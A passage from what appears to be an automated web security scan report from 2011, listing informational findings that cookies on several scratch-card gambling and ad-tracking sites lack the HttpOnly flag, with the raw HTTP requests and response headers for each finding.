Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

12.125. http://home.okscratchcards.com/PlayersClub.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://home.okscratchcards.com
Path:	/PlayersClub.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:14:52 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /PlayersClub.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

12.126. http://home.okscratchcards.com/Promotions.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://home.okscratchcards.com
Path:	/Promotions.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=15538&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=okscratchcards.com; expires=Fri, 16-May-2031 12:14:38 GMT; path=/
UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:14:38 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.127. http://home.okscratchcards.com/Responsible.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://home.okscratchcards.com
Path:	/Responsible.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:15:17 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Responsible.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

12.128. http://home.okscratchcards.com/SecurityAndPrivacy.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://home.okscratchcards.com
Path:	/SecurityAndPrivacy.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:15:13 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /SecurityAndPrivacy.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

12.129. http://home.okscratchcards.com/Terms.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://home.okscratchcards.com
Path:	/Terms.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:15:10 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Terms.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

12.130. http://home.okscratchcards.com/help.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://home.okscratchcards.com
Path:	/help.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:14:55 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /help.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

12.131. http://home.okscratchcards.com/visit.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://home.okscratchcards.com
Path:	/visit.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CSI_20=EncryptedUniqueVisitorID=100D72CCED40B0AE0CA3B783BDAC6CB7&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=okscratchcards.com; expires=Fri, 16-May-2031 11:41:04 GMT; path=/
UniqueVisitorID=100D72CCED40B0AE0CA3B783BDAC6CB7; domain=okscratchcards.com; expires=Fri, 16-May-2014 11:41:04 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.132. http://it.bigmoneyscratch.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://it.bigmoneyscratch.com
Path:	/Home.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CSI_12=EncryptedUniqueVisitorID=E9F94BE04098FBE7F8CCB206CCDB21E5&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=bigmoneyscratch.com; expires=Fri, 16-May-2031 12:02:25 GMT; path=/
UniqueVisitorID=E9F94BE04098FBE7F8CCB206CCDB21E5; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:02:25 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: it.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:02:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=0zlhnt55momsyp55ncyjqa55; path=/; HttpOnly
Set-Cookie: LanguageCode=ITA; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:02:25 GMT; path=/
Set-Cookie: CSI_12=EncryptedUniqueVisitorID=E9F94BE04098FBE7F8CCB206CCDB21E5&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=bigmoneyscratch.com; expires=Fri, 16-May-2031 12:02:25 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:02:25 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:02:25 GMT; path=/
Set-Cookie: UniqueVisitorID=E9F94BE04098FBE7F8CCB206CCDB21E5; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:02:25 GMT; path=/
Set-Cookie: LanguageCode=ITA; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:02:25 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:02:25 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 48620

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.133. http://it.karamba.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://it.karamba.com
Path:	/Home.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CSI_27=EncryptedUniqueVisitorID=CD543190925D81437E19D693AEB6F08F&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=karamba.com; expires=Fri, 16-May-2031 12:32:29 GMT; path=/
UniqueVisitorID=CD543190925D81437E19D693AEB6F08F; domain=karamba.com; expires=Fri, 16-May-2014 12:32:29 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: it.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=vfoiefqow3k4oyvyuuo5pp45; path=/; HttpOnly
Set-Cookie: LanguageCode=ITA; domain=karamba.com; expires=Fri, 16-May-2014 12:32:29 GMT; path=/
Set-Cookie: CSI_27=EncryptedUniqueVisitorID=CD543190925D81437E19D693AEB6F08F&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=karamba.com; expires=Fri, 16-May-2031 12:32:29 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:32:29 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:32:29 GMT; path=/
Set-Cookie: UniqueVisitorID=CD543190925D81437E19D693AEB6F08F; domain=karamba.com; expires=Fri, 16-May-2014 12:32:29 GMT; path=/
Set-Cookie: LanguageCode=ITA; domain=karamba.com; expires=Fri, 16-May-2014 12:32:29 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:32:29 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44753

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.134. http://it.scratch2cash.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://it.scratch2cash.com
Path:	/Home.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CSI_1=EncryptedUniqueVisitorID=78BEC340FC10D9F146C48FE864AF9956&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratch2cash.com; expires=Fri, 16-May-2031 12:39:07 GMT; path=/
UniqueVisitorID=78BEC340FC10D9F146C48FE864AF9956; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:39:07 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: it.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.135. http://it.scratchcardheaven.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://it.scratchcardheaven.com
Path:	/Home.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CSI_8=EncryptedUniqueVisitorID=36EAF86AF0B3D8CA912430DC4C3017B0&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratchcardheaven.com; expires=Fri, 16-May-2031 11:58:46 GMT; path=/
UniqueVisitorID=36EAF86AF0B3D8CA912430DC4C3017B0; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 11:58:46 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: it.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.136. http://m.xp1.ru4.com/ad previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://m.xp1.ru4.com
Path:	/ad

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

17210403-B17210472=6|17210476|0|0|0|17210467|17226289|-1; domain=.ru4.com; path=/
P1807966=c3N2X2MzfFl8MTMwNTU1MDMzMXxzc3ZfYnxjM3wxMzA1NTUwMzMxfHNzdl8xfDI4NTk1MjcyMXwxMzA1NTUwMzMxfA==; domain=.ru4.com; path=/; expires=Mon, 16-Nov-2012 08:52:11 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.137. http://nettiarpa.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://nettiarpa.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CSI_11=EncryptedUniqueVisitorID=9A7D28C5493E17C1FB483D0DFAD36B49&AffiliateID=11&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=nettiarpa.com; expires=Fri, 16-May-2031 11:48:26 GMT; path=/
UniqueVisitorID=9A7D28C5493E17C1FB483D0DFAD36B49; domain=nettiarpa.com; expires=Fri, 16-May-2014 11:48:26 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: nettiarpa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:48:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=0ndiwi55yv4s1vbj1zkcer45; path=/; HttpOnly
Set-Cookie: CSI_11=EncryptedUniqueVisitorID=9A7D28C5493E17C1FB483D0DFAD36B49&AffiliateID=11&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=nettiarpa.com; expires=Fri, 16-May-2031 11:48:26 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=nettiarpa.com; expires=Fri, 16-May-2014 11:48:26 GMT; path=/
Set-Cookie: BO=FM; domain=nettiarpa.com; expires=Fri, 16-May-2014 11:48:26 GMT; path=/
Set-Cookie: UniqueVisitorID=9A7D28C5493E17C1FB483D0DFAD36B49; domain=nettiarpa.com; expires=Fri, 16-May-2014 11:48:26 GMT; path=/
Set-Cookie: LanguageCode=FIN; domain=nettiarpa.com; expires=Fri, 16-May-2014 11:48:26 GMT; path=/
Set-Cookie: CountryCode=US; domain=nettiarpa.com; expires=Fri, 16-May-2014 11:48:26 GMT; path=/
Set-Cookie: CSITemp=11; domain=nettiarpa.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 37084

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.138. http://nl.bigmoneyscratch.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://nl.bigmoneyscratch.com
Path:	/Home.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CSI_12=EncryptedUniqueVisitorID=A12B6AC1C6EE481333F92046DFDFF5BD&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=bigmoneyscratch.com; expires=Fri, 16-May-2031 12:02:30 GMT; path=/
UniqueVisitorID=A12B6AC1C6EE481333F92046DFDFF5BD; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:02:30 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: nl.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.139. http://nl.karamba.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://nl.karamba.com
Path:	/Home.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CSI_27=EncryptedUniqueVisitorID=EDF8166FB9CEDAF2CE21F6C19F96D1AE&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=karamba.com; expires=Fri, 16-May-2031 12:32:19 GMT; path=/
UniqueVisitorID=EDF8166FB9CEDAF2CE21F6C19F96D1AE; domain=karamba.com; expires=Fri, 16-May-2014 12:32:19 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: nl.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.140. http://nl.scratch2cash.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://nl.scratch2cash.com
Path:	/Home.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CSI_1=EncryptedUniqueVisitorID=6ACBD6E12B9BF1DA9940EF274BF98EA6&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratch2cash.com; expires=Fri, 16-May-2031 12:09:23 GMT; path=/
UniqueVisitorID=6ACBD6E12B9BF1DA9940EF274BF98EA6; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:09:23 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: nl.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.141. http://nl.scratchcardheaven.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://nl.scratchcardheaven.com
Path:	/Home.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CSI_8=EncryptedUniqueVisitorID=0CF0E4FE534E9E4DD2E70C00549F543E&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratchcardheaven.com; expires=Fri, 16-May-2031 12:13:30 GMT; path=/
UniqueVisitorID=0CF0E4FE534E9E4DD2E70C00549F543E; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:13:30 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: nl.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.142. http://no.bigmoneyscratch.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://no.bigmoneyscratch.com
Path:	/Home.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CSI_12=EncryptedUniqueVisitorID=29FFBAAEA73D5B5F2F922DE01CED2B55&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=bigmoneyscratch.com; expires=Fri, 16-May-2031 11:58:56 GMT; path=/
UniqueVisitorID=29FFBAAEA73D5B5F2F922DE01CED2B55; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 11:58:56 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: no.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.143. http://no.karamba.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://no.karamba.com
Path:	/Home.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CSI_27=EncryptedUniqueVisitorID=522E66105AD1EC714AF629DF19E62306&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=karamba.com; expires=Fri, 16-May-2031 12:35:39 GMT; path=/
UniqueVisitorID=522E66105AD1EC714AF629DF19E62306; domain=karamba.com; expires=Fri, 16-May-2014 12:35:39 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: no.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.144. http://no.scratchcardheaven.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://no.scratchcardheaven.com
Path:	/Home.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CSI_8=EncryptedUniqueVisitorID=20914B9EC2030E414402DD35EBA7E838&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratchcardheaven.com; expires=Fri, 16-May-2031 12:39:25 GMT; path=/
UniqueVisitorID=20914B9EC2030E414402DD35EBA7E838; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:39:25 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: no.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.145. http://pixel.invitemedia.com/data_sync previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.invitemedia.com
Path:	/data_sync

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

dp_rec="{\"2\": 1305550329}"; Domain=invitemedia.com; expires=Tue, 15-May-2012 12:52:09 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.146. http://pixel.quantserve.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.quantserve.com
Path:	/pixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

d=EKIBXQHhBoGTDhmtEqlQq8GBuGECniAAAACKoXoYEHOBFzDLOB9XIDBYGxBgqDWv8hEA; expires=Sun, 14-Aug-2011 12:51:52 GMT; path=/; domain=.quantserve.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.147. http://pixel.quantserve.com/pixel/p-96ifrWFBpTdiA.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.quantserve.com
Path:	/pixel/p-96ifrWFBpTdiA.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

d=EKIBXQHhBoGTDhmtEqlQq8GBuGECniAAAACKoXoYEHOBFzDLOB9XIDBYGxBgqDWv8hEA; expires=Sun, 14-Aug-2011 12:51:52 GMT; path=/; domain=.quantserve.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.148. http://primescratchcards.com/images/HelpDepositMethods.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://primescratchcards.com
Path:	/images/HelpDepositMethods.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ARC=130137; expires=Tue, 15-May-2012 12:38:20 GMT; domain=.primescratchcards.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/HelpDepositMethods.asp HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:20 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19315
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:38:20 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...

12.149. http://primescratchcards.com/images/InviteFriend.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://primescratchcards.com
